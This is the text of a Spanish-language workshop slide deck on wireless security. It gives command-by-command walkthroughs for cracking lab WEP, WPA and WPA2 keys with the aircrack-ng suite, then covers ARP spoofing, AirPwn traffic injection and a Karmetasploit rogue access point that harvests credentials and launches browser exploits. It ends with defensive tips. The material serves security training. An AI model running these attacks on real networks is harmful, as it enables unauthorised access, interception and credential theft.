Workshop Seguridad Inalámbrica

Jaime Andrés Restrepo

Agenda del Workshop

• ¿Cuál es tu SSID?

• ¿Porqué el WorkShop?

• ¿Como vamos a trabajar?

• Manos a la Obra!!

¿Cuál es tu SSID?

Jaime

Andrés

María

Valentina

Jairo ……

¿Por que el Workshop? •  Gran porcentaje de implementaciones

inalámbricas.

•  Poco interés por la seguridad en redes inalámbricas, en entornos caseros y empresariales.

•  Desconocimiento de los problemas de seguridad en redes inalámbricas

¿Cómo vamos a Trabajar?

•  GRUPO II ���SSID: (WEP-II, WEP-ST-II, WPA-II, WPA2-II) ���Mac: F0:7D:68:52:AA:07

•  GRUPO I ���SSID: (WEP, WEP-ST, WPA, WPA2) ���Mac: 00:1B:11:3A:B6:9D

Manos a la obra!! •  Inicia la maquina virtual o

introduce el DVD

•  Ingresa el usuario root y clave toor, luego startx

•  Conecta la memoria Wireless USB, si la tienes.

Si no tienes una tarjeta compatible.. No te preocupes

WEP

start-network

iwconfig

Iniciando la red y configurando la

tarjeta

airmon-ng start wlan0

Ponemos nuestra tarjeta inalámbrica en modo monitor.

airodump-ng mon0

Iniciamos una captura general de

trafico, para identificar las redes

activas a las que tenemos alcance.

Con los resultados del comando anterior, podemos identificar varias redes e información que será muy importante para poder descifrar la clave de la red inalámbrica.

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0

Ponemos nuestra tarjeta inalámbrica a

capturar la información

especifica que nos interesa, de la red

inalámbrica que seleccionamos

anteriormente.

Iniciamos la captura y podemos ver los usuarios conectados, cuantos paquetes ha enviado y capturamos esos paquetes en el archivo WEP.cap

aircrack-ng WEP-01.cap

Ejecutamos el aircrack para sacar la

clave de la red, que se encuentra en los

paquetes que capturamos

anteriormente.

Clave: weppw

Clave en HEXA

En la anterior captura, es en un entorno donde hay clientes conectados y

haciendo uso de la red.

Pero… ¿y si no hay trafico?

Identificamos la red que deseamos

auditar y obtenemos la información que

será importante para poder descifrar

la clave de la red inalámbrica.

Si hay clientes pero no hay trafico

Pocos datos

Identificamos un cliente conectado a la red, pero no esta

navegando y no conseguimos muchos

datos.

Pocos datos y solo 12 IVs (vector de inicialización), necesitaremos al menos 5000

Intentamos crackear la clave con los pocos

paquetes que logramos conseguir y

nos dice que necesitamos muchos

mas paquetes ¿Qué hacemos?

airodump-ng -c 6 --bssid MACROUTER -w WEP-ST mon0

Como el cliente que tenemos conectado

a la red, no esta navegando, vamos a

capturar algún paquete que envié el cliente, suplantarlo y

reenviarlo muchas veces trafico al

router.

aireplay-ng -3 -b MACROUTER -h MACCLIENTE mon0

Logramos una buena cantidad de datos

Conseguimos capturar un paquete

del cliente y repetirlo muchas

veces para generar trafico suplantando

el cliente legitimo ante el router.

Paquetes que inyectamos

28059 IVs, contra 12 que teníamos….

Después de inyectar todos esos

paquetes, ya contamos con los

suficientes vectores para crackear la clave como ya lo

hicimos anteriormente.

aircrack-ng WEP-ST-01.cap

¿Puedo automatizar todos estos procesos?

cd /pentest/wepbuster/ ./wepbuster

Wesside-ng –i mon0

WepBuster – Wesside-NG

WPA

airodump-ng mon0

Iniciamos una captura general de

trafico, para identificar las redes

WPA activas a las que tenemos

alcance.

Ponemos nuestra tarjeta inalámbrica a

capturar la información

especifica que nos interesa, de la red

inalámbrica que seleccionamos

anteriormente.

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE mon0

Iniciamos la captura y

podemos ver los usuarios

conectados, cuantos paquetes

ha enviado y capturamos esos

paquetes en el archivo WPA.cap

Tenemos muy buenos datos, pero…

Al ejecutar aircrack-ng WPA-01.cap, nos encontramos con 0 handshake

Como WPA se crackea, por

fuerza bruta y no descifrando la

clave como WEP, no nos importa los

datos sino el “apretón de

manos” inicial entre el pc y el

router (handshake)

Ponemos a capturar…

airepaly-ng -0 1 –a MACROUTER –c MACCLIENTE mon0

En esta ocasión lo que nos importa es

capturar por la el “apretón de manos”

donde se ponen de acuerdo cliente y

servidor de la forma en que trabajaran,

esta información la usaremos para

crackear la clave wifi por fuerza bruta.

aircrack-ng WPA-01.cap

Lanzamos el aircrack a el archivo .cap

generado, para verificar que

efectivamente contemos con el

handshake (apretón de

manos) y podemos empezar a lanzar

el ataque de fuerza bruta.

aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b 00:1B:3A:B6:9D WPA-01.cap

Lanzamos el ataque de fuerza

bruta con el diccionario que

trae incorporado el backtrack y

esperamos que alguna de las claves

que estén en el, sea la del router.

Después de casi 14 minutos, obtenemos la clave del router, que en este caso era !n5en5!7!v!7y

KEY FOUND!, encontramos la

clave de la red WPA, después ya

que afortunadamente

estaba en el diccionario de password que

utilizamos.

WPA2 ���básicamente lo mismo que WPA

airodump-ng -c CANAL --bssid MACROUTER -w NOMBRE

mon0

airodump-ng mon0

airepaly-ng -0 1 –a MACROUTER –c

MACCLIENTE mon0

aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst -b 00:1B:

11:3A:B6:9D WPA2-01.cap

Paramos el ataque de des autenticación y

verificamos que tenemos el handshake

Iniciamos el crackeo de la contraseña por fuerza bruta

Después de casi 2 horas, obtenemos la clave del router, que en este caso era ecuatoriano

KEY FOUND!, encontramos la

clave de la red WPA2, ya que

afortunadamente estaba en el

diccionario de password que

utilizamos.

¿Puedo automatizar todos estos procesos?

WiFite Consola GUI

http://code.google.com/p/wifite/

Que hago después de entrar a la red…

vacío

admin

www.routerpasswords.com

Pero también podemos… •  Escanear la red en busca de equipos con

información o vulnerables.

•  Lanzar un ataque ARP Spoofing para capturar los datos que corren por esa red inalámbrica.

•  Usar su infraestructura, impresoras, conexión a internet y aplicaciones locales.

•  Cualquier otra cosa que se nos ocurra…

EXTRAS

AirPwn

airpwn

Framework wireless que

permite inyectar paquetes

entrantes, que encajen con un

patrón que definamos en el

archivo de configuración.

airpwn –d DRIVER –i mon0 –k CLAVEWEPHEXA –c

CONFIGURACION –vvv -F

Iniciamos la herramienta con

una configuración personalizada que

nos permitirá reemplazar

cualquier petición HTTP del cliente

por la nuestra.

Ataque en ejecución.

Resultado del ataque

Karmetasploit

airmon-ng start wlan0

Airbase-ng –P –C 30 –e ^”WPA” –v mon0

Ponemos nuestra tarjeta en modo

monitor e iniciamos un

accesspoint con un essid conocido…

nano /etc/dhcp3/dhcpd.conf option domain-name-servers 10.0.0.1; default-lease-time 60; max-lease-time 72; ddns-update-style none; authoritative; log-facility local7; subnet 10.0.0.0 netmask 255.255.255.0 { range 10.0.0.100 10.0.0.254; option routers 10.0.0.1; option domain-name-servers 10.0.0.1; }

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0

/etc/init.d/dhcp3-server start

wget http://digitaloffense.net/tools/karma.rc

./msfconsole –r karma.rc

Descargamos el karmetasploit de

la pagina oficial, lo ejecutamos y

esperamos que cargue

completamente

Oye tu eres mi

red?

Claro yo soy tu red

Comunícame por fa con

pop.hotmail.com

Yo soy pop.hotmail.com,

¿cual es tu usuario y clave?

Mi usuario es inocencia y mi clave 123456

Muchas gracias inocencia, espera yo

verifico tus datos

Atacante Victima

El resultado que veremos en los clientes que se conecten a nuestro falso access point, depende de los servicios que le solicite el cliente al karmetasploit. Si solicita un cliente pop3,ftp,dns,smb, simula ser uno y almacena los datos que proporcione el cliente en la base de datos karma.db Si hacemos una petición http en cambio nos ejecuta el modulo browser_autopwn del metasploit, para tratar de explotar alguna vulnerabilidad en nuestro navegador y conseguir una shell en el sistema.

¿Como nos protegemos?

¿Como podemos protégenos? •  Cambiar clave por defecto y SSID

(preferiblemente ocúltelo) al router

•  Usar WPA o WPA2 con clave fuerte.

•  Realizar Filtrado por Mac y limitar el numero de conexiones

•  Bajar la potencia a nuestro router

•  Apagar el router cuando no���se utilice

•  Usar pintura DefendAir

Cifrado: ???

Cifrado: ???

Cifrado: ???